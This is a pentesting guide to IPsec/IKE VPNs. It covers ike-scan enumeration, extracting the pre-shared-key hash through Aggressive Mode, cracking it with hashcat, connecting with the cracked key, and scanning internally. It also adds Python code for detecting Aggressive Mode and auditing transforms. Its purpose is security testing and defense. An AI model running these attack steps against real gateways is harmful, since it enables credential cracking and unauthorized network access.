# Pentesting IPsec/IKE

**Ports:** UDP 500 (IKE), UDP 4500 (NAT-T IKE)

IPsec VPNs use Internet Key Exchange (IKE) to negotiate and establish tunnels. Misconfigurations, most notably IKEv1 Aggressive Mode combined with pre-shared key (PSK) authentication, can leak a hash derived from the PSK that an attacker can crack offline.

***

## Discovery

```bash
# UDP scan for IKE
nmap -sU -p 500,4500 $ip

# Service version
nmap -sU -p 500 -sV $ip
```

***

## ike-scan

Primary tool for IKE enumeration and attacks.

```bash
# Install
sudo apt install ike-scan
```

### Basic Enumeration

```bash
# Check if IKE is running (Main Mode)
ike-scan -M $ip
```

**Output interpretation:**

| Result                                    | Meaning                                       |
| ----------------------------------------- | --------------------------------------------- |
| `1 returned handshake; 0 returned notify` | Target is IPsec gateway, willing to negotiate |
| `0 returned handshake; 1 returned notify` | None of proposed transforms acceptable        |
| `0 returned handshake; 0 returned notify` | Not an IPsec gateway                          |

### Vendor Identification

```bash
# Fingerprint vendor via backoff timing
ike-scan -M --showbackoff $ip
```

***

## Aggressive Mode Attack (PSK Extraction)

IKEv1 Aggressive Mode with PSK authentication is weak by design: the responder sends its identity and HASH_R in the clear in the second message, before the initiator has proven knowledge of the PSK, so anyone who can elicit or capture that exchange obtains a hash that can be cracked offline.

```bash
# Aggressive mode with fake ID (extracts hash if server responds)
ike-scan -P -M -A -n fakeID $ip
```

**Key output to look for:**

* `ID(Type=ID_USER_FQDN, Value=...)`: the responder's ID payload, which reveals the server's group name/ID
* `Hash(20 bytes)`: HASH_R, the value fed to the cracker (20 bytes for SHA1, 16 bytes for MD5)
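From the defender's side, the same weakness is visible on the wire: every IKEv1 Aggressive Mode exchange carries exchange type 4 in the 28-byte ISAKMP header, and its first two messages are unencrypted. The parser below is an added detection example (not ike-scan code and not from the original page) that reads the ISAKMP header from a UDP/500 payload (or a UDP/4500 payload behind the 4-byte non-ESP marker) and reports Aggressive Mode initiations and responses, so a monitoring rule can flag gateways that still accept Aggressive Mode. The sample packets are constructed in `build_sample`; the header layout and exchange-type numbers follow RFC 2408/2409 and RFC 7296.

```python
import struct
from typing import Optional

# ISAKMP fixed header (RFC 2408 section 3.1), network byte order:
# initiator cookie (8), responder cookie (8), next payload (1), version (1),
# exchange type (1), flags (1), message ID (4), total length (4)
ISAKMP_HDR = struct.Struct(">8s8sBBBBII")
ISAKMP_HDR_LEN = ISAKMP_HDR.size          # 28 bytes
NON_ESP_MARKER = b"\x00\x00\x00\x00"      # prefix on IKE messages sent over UDP/4500 (NAT-T)
ZERO_COOKIE = b"\x00" * 8                 # responder cookie is zero in the first message

# (major version, exchange type) -> name
EXCHANGE_TYPES = {
    (1, 2): "IKEv1 Identity Protection (Main Mode)",
    (1, 4): "IKEv1 Aggressive Mode",
    (1, 5): "IKEv1 Informational",
    (1, 32): "IKEv1 Quick Mode",
    (2, 34): "IKEv2 IKE_SA_INIT",
    (2, 35): "IKEv2 IKE_AUTH",
    (2, 36): "IKEv2 CREATE_CHILD_SA",
    (2, 37): "IKEv2 INFORMATIONAL",
}


def parse_isakmp(payload: bytes, udp_port: int = 500) -> Optional[dict]:
    """Parse the ISAKMP header of one UDP payload; return None if it is not an IKE message."""
    if udp_port == 4500:
        if not payload.startswith(NON_ESP_MARKER):
            return None  # UDP-encapsulated ESP or a NAT keepalive, not IKE
        payload = payload[len(NON_ESP_MARKER):]
    if len(payload) < ISAKMP_HDR_LEN:
        return None
    cky_i, cky_r, next_payload, version, exch, flags, msg_id, length = ISAKMP_HDR.unpack_from(payload)
    if length != len(payload):
        return None  # the length field must cover exactly the message we received
    major = version >> 4
    return {
        "major_version": major,
        "exchange_type": exch,
        "exchange_name": EXCHANGE_TYPES.get((major, exch), f"unknown({exch})"),
        "encrypted": bool(flags & 0x01),          # E flag: payloads after the header are encrypted
        "from_responder": cky_r != ZERO_COOKIE,   # responder fills in its cookie in message 2
        "aggressive_mode": major == 1 and exch == 4,
        "message_id": msg_id,
        "length": length,
    }


def aggressive_mode_event(payload: bytes, udp_port: int = 500) -> Optional[str]:
    """Return a short event label for Aggressive Mode traffic, or None for anything else.

    'aggressive-response' is the interesting one: the gateway accepted Aggressive Mode and
    its HASH_R travelled in the clear in this message.
    """
    hdr = parse_isakmp(payload, udp_port)
    if hdr is None or not hdr["aggressive_mode"] or hdr["encrypted"]:
        return None
    return "aggressive-response" if hdr["from_responder"] else "aggressive-initiation"


def build_sample(exch: int, major: int = 1, responder: bool = False,
                 body: bytes = b"\x00" * 40, nat_t: bool = False) -> bytes:
    """Constructed test packet: a valid header over a dummy body (not a real capture)."""
    cky_i = b"\x01" * 8
    cky_r = b"\x02" * 8 if responder else ZERO_COOKIE
    hdr = ISAKMP_HDR.pack(cky_i, cky_r, 1, major << 4, exch, 0, 0, ISAKMP_HDR_LEN + len(body))
    pkt = hdr + body
    return NON_ESP_MARKER + pkt if nat_t else pkt


if __name__ == "__main__":
    for label, pkt, port in [
        ("aggressive initiation", build_sample(4), 500),
        ("aggressive response", build_sample(4, responder=True), 500),
        ("main mode", build_sample(2), 500),
        ("aggressive over NAT-T", build_sample(4, nat_t=True), 4500),
    ]:
        print(f"{label:24s} -> {aggressive_mode_event(pkt, port)}")
```

Checking the length field against the datagram size and requiring the E flag to be clear keeps the rule from firing on truncated captures or on later encrypted messages of the same exchange; a source that repeatedly triggers `aggressive-initiation` against a gateway that never answers is scanning, while any `aggressive-response` from your own gateway means Aggressive Mode is enabled and should be reviewed.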

### Full PSK Hash Extraction

```bash
# Print the PSK parameters to stdout (-P)
ike-scan -P -M -A -n fakeID $ip

# Or write them straight to a file (no space between -P and the filename)
ike-scan -Phash.txt -M -A -n fakeID $ip
```

The output contains IKE PSK parameters in this format:

```
g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
```

Save the entire parameter string to a file for cracking.

### Note on Fake Hashes

> A hash may come back even for a bogus ID: some gateways deliberately return a fake hash for unknown IDs so that group names cannot be enumerated. Only a hash that cracks successfully was real.

***

## Cracking IKE-PSK Hash

```bash
# Identify hash type
hashcat --identify hash.txt
# Output: 5400 | IKE-PSK SHA1

# Crack with rockyou
hashcat -a 0 -m 5400 hash.txt /usr/share/wordlists/rockyou.txt

# MD5 variant
hashcat -a 0 -m 5300 hash.txt /usr/share/wordlists/rockyou.txt
```

### Hashcat IKE Modes

| Mode | Description  |
| ---- | ------------ |
| 5300 | IKE-PSK MD5  |
| 5400 | IKE-PSK SHA1 |
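Before spending GPU time, it is worth checking that the captured parameter string is complete and picking the mode from the hash length rather than guessing. The function below is an added example (not from the original page, hashcat or ike-scan) that validates the nine colon-separated hex fields described under Full PSK Hash Extraction, decodes the responder ID payload body (ID type, protocol, port, data per RFC 2407 section 4.6.2), infers the DH group from the size of the public values, and returns the matching hashcat mode from the table above. The two sample strings are constructed with filler bytes and are not real captures.

```python
from typing import Optional

# Field order of an ike-scan -P line: g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

# HASH_R length -> (hashcat mode, name); matches the Hashcat IKE Modes table
HASH_MODES = {16: (5400 - 100, "IKE-PSK MD5"), 20: (5400, "IKE-PSK SHA1")}

# Size of a DH public value in bytes -> MODP group (RFC 2409 / RFC 3526)
DH_GROUP_BY_SIZE = {96: "MODP768", 128: "MODP1024", 192: "MODP1536", 256: "MODP2048"}

# ISAKMP identification types (RFC 2407 section 4.6.2.1)
ID_TYPES = {1: "ID_IPV4_ADDR", 2: "ID_FQDN", 3: "ID_USER_FQDN", 11: "ID_KEY_ID"}


def decode_id_body(idir_b: bytes) -> tuple:
    """Decode an ID payload body: type(1) protocol(1) port(2) data(n)."""
    if len(idir_b) < 4:
        raise ValueError("idir_b shorter than the 4-byte ID header")
    id_type, data = idir_b[0], idir_b[4:]
    name = ID_TYPES.get(id_type, f"ID_TYPE_{id_type}")
    if id_type == 1 and len(data) == 4:
        value = ".".join(str(b) for b in data)
    elif id_type in (2, 3):
        value = data.decode("ascii", errors="replace")
    else:
        value = data.hex()
    return name, value


def parse_ike_psk_params(line: str) -> dict:
    """Validate an ike-scan PSK parameter line and return what a cracker needs to know."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} colon-separated fields, got {len(parts)}")
    raw = {}
    for name, hexval in zip(FIELDS, parts):
        try:
            raw[name] = bytes.fromhex(hexval)
        except ValueError as exc:
            raise ValueError(f"field {name} is not valid hex") from exc
    for cky in ("cky_r", "cky_i"):
        if len(raw[cky]) != 8:
            raise ValueError(f"{cky} must be 8 bytes, got {len(raw[cky])}")
    if len(raw["g_xr"]) != len(raw["g_xi"]):
        raise ValueError("DH public values g_xr and g_xi differ in length")
    for nonce in ("ni_b", "nr_b"):
        if not 8 <= len(raw[nonce]) <= 256:  # RFC 2409 section 5: nonce is 8 to 256 bytes
            raise ValueError(f"{nonce} has implausible length {len(raw[nonce])}")
    mode = HASH_MODES.get(len(raw["hash_r"]))
    if mode is None:
        raise ValueError(f"hash_r is {len(raw['hash_r'])} bytes; expected 16 (MD5) or 20 (SHA1)")
    return {
        "hashcat_mode": mode[0],
        "hash_name": mode[1],
        "dh_group_guess": DH_GROUP_BY_SIZE.get(len(raw["g_xr"]), f"{len(raw['g_xr']) * 8}-bit"),
        "responder_id": decode_id_body(raw["idir_b"]),
    }


def is_valid_params(line: str) -> bool:
    try:
        parse_ike_psk_params(line)
        return True
    except ValueError:
        return False


# Constructed samples: repeated filler bytes of the right sizes, not real captures.
_IDIR = "031101f4" + "vpngroup".encode().hex()   # ID_USER_FQDN, UDP, port 500, "vpngroup"
SAMPLE_SHA1 = ":".join(["a1" * 128, "b2" * 128, "11" * 8, "22" * 8, "00" * 36, _IDIR,
                        "c3" * 20, "d4" * 20, "e5" * 20])
SAMPLE_MD5 = ":".join(["a1" * 96, "b2" * 96, "11" * 8, "22" * 8, "00" * 36, _IDIR,
                       "c3" * 16, "d4" * 16, "e5" * 16])

if __name__ == "__main__":
    for s in (SAMPLE_SHA1, SAMPLE_MD5):
        info = parse_ike_psk_params(s)
        print(f"-m {info['hashcat_mode']} ({info['hash_name']}), {info['dh_group_guess']}, "
              f"responder ID {info['responder_id']}")
```

The decoded responder ID is the same group name that ike-scan shows as `ID(Type=ID_USER_FQDN, Value=...)`, and the DH group tells you which `--trans` group the gateway settled on, which is useful when documenting a weak-group finding.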

***

## Transform Enumeration

If default transforms fail, enumerate acceptable ones:

```bash
# Try different encryption/hash combos (order is enc,hash,auth,group)
ike-scan -M --trans=5,2,1,2 $ip      # 3DES, SHA1, PSK, MODP1024
ike-scan -M --trans=7,2,1,2 $ip      # AES-128, SHA1, PSK, MODP1024
ike-scan -M --trans=7/256,2,1,2 $ip  # AES-256, SHA1, PSK, MODP1024
```

### Transform Format

`--trans=enc,hash,auth,group`

| Encryption | Hash     | Auth          | Group        |
| ---------- | -------- | ------------- | ------------ |
| 5 = 3DES   | 1 = MD5  | 1 = PSK       | 1 = MODP768  |
| 7 = AES    | 2 = SHA1 | 2 = RSA       | 2 = MODP1024 |
|            |          | 64221 = XAUTH | 5 = MODP1536 |
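When auditing a gateway you usually end up with a pile of `--trans` tuples that were accepted and a handful of ike-scan summary lines, and the question is which of them are findings. The code below is an added example (not part of the original page or of ike-scan) that serves both the Output interpretation table under Basic Enumeration and the Transform Format table above: `classify_summary` maps the handshake/notify counts of an ike-scan ending line to the table's three meanings, and `decode_transform` expands an `enc[/keylen],hash,auth,group` tuple into names and a list of weakness findings. The numeric identifiers are the IKEv1 attribute values from RFC 2409 Appendix A (plus the XAUTH/Hybrid authentication code points from the respective drafts); the sample summary line is constructed.

```python
import re
from typing import List

# IKEv1 attribute values (RFC 2409 Appendix A); XAUTH/Hybrid auth values come from the drafts
ENC = {1: "DES", 2: "IDEA", 3: "Blowfish", 4: "RC5", 5: "3DES", 6: "CAST", 7: "AES"}
HASH = {1: "MD5", 2: "SHA1", 3: "Tiger", 4: "SHA2-256", 5: "SHA2-384", 6: "SHA2-512"}
AUTH = {1: "PSK", 2: "DSS signature", 3: "RSA signature", 4: "RSA encryption",
        64221: "Hybrid RSA (XAUTH)", 65001: "XAUTH with PSK"}
GROUP = {1: "MODP768", 2: "MODP1024", 5: "MODP1536", 14: "MODP2048", 15: "MODP3072"}
PSK_BASED_AUTH = {1, 65001}


def decode_transform(spec: str) -> dict:
    """Decode an ike-scan --trans value such as '7/256,2,1,2' and rate it."""
    parts = spec.strip().split(",")
    if len(parts) != 4:
        raise ValueError("transform must be enc[/keylen],hash,auth,group")
    enc_part, keylen = parts[0], None
    if "/" in enc_part:                      # AES needs an explicit key length, e.g. 7/256
        enc_part, keylen_s = enc_part.split("/", 1)
        keylen = int(keylen_s)
    enc, hsh, auth, group = (int(x) for x in (enc_part, parts[1], parts[2], parts[3]))

    enc_name = ENC.get(enc, f"enc#{enc}")
    if keylen is not None:
        enc_name += f"-{keylen}"

    findings: List[str] = []
    if enc == 1:
        findings.append("DES: 56-bit key, broken")
    elif enc == 5:
        findings.append("3DES: legacy cipher, 64-bit block (Sweet32)")
    elif enc == 7 and keylen is not None and keylen < 128:
        findings.append(f"AES key length {keylen} below 128 bits")
    if hsh == 1:
        findings.append("MD5 integrity/PRF: deprecated")
    if group in (1, 2):
        findings.append(f"{GROUP[group]}: DH group too small, 2048-bit or stronger expected")
    if auth in PSK_BASED_AUTH:
        findings.append("PSK-based authentication: offline-crackable if Aggressive Mode is enabled")

    return {
        "enc": enc_name,
        "hash": HASH.get(hsh, f"hash#{hsh}"),
        "auth": AUTH.get(auth, f"auth#{auth}"),
        "group": GROUP.get(group, f"group#{group}"),
        "findings": findings,
    }


# Matches the tail of an ike-scan ending line, e.g. "1 returned handshake; 0 returned notify"
SUMMARY_RE = re.compile(r"(\d+) returned handshake; (\d+) returned notify")


def classify_summary(line: str) -> str:
    """Map an ike-scan summary line to the Output interpretation table."""
    m = SUMMARY_RE.search(line)
    if not m:
        raise ValueError("no 'returned handshake; returned notify' summary in line")
    handshake, notify = int(m.group(1)), int(m.group(2))
    if handshake > 0:
        return "gateway-accepts"    # IPsec gateway, willing to negotiate a proposed transform
    if notify > 0:
        return "gateway-rejects"    # IPsec gateway, none of the proposed transforms acceptable
    return "no-ike"                 # not an IPsec gateway (or filtered)


if __name__ == "__main__":
    # Constructed ending line in ike-scan's format; not output from a real scan.
    sample = ("Ending ike-scan 1.9.5: 1 hosts scanned in 0.085 seconds (11.76 hosts/sec).  "
              "1 returned handshake; 0 returned notify")
    print(classify_summary(sample))
    for spec in ("5,2,1,2", "7/256,2,1,2", "7/256,4,3,14"):
        t = decode_transform(spec)
        print(spec, "->", t["enc"], t["hash"], t["auth"], t["group"])
        for f in t["findings"]:
            print("   finding:", f)
```

A sweep that only ever returns `gateway-rejects` means the gateway is up but none of the tuples you offered match its policy; decode the ones that do come back with `gateway-accepts` and report every non-empty `findings` list.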

***

## Connecting to VPN

Once you have credentials:

### StrongSwan

```bash
# Install
sudo apt install strongswan

# Config files
/etc/ipsec.conf
/etc/ipsec.secrets
```

Example `/etc/ipsec.secrets`:

```
%any : PSK "cracked_password_here"
```

### vpnc

```bash
sudo apt install vpnc

# Create config
sudo vim /etc/vpnc/vpn.conf
```

Example config:

```
IPSec gateway TARGET_IP
IPSec ID group_name
IPSec secret cracked_psk
Xauth username username_here
Xauth password password_here
```

Connect:

```bash
sudo vpnc /etc/vpnc/vpn.conf
```

***

## Post-Connection

After VPN connection:

```bash
# Check new interface
ip addr

# Re-scan internal network
nmap -sC -sV TARGET_INTERNAL_IP
```

***

## References

* <https://book.hacktricks.xyz/network-services-pentesting/ipsec-ike-vpn-pentesting>
* ike-scan documentation
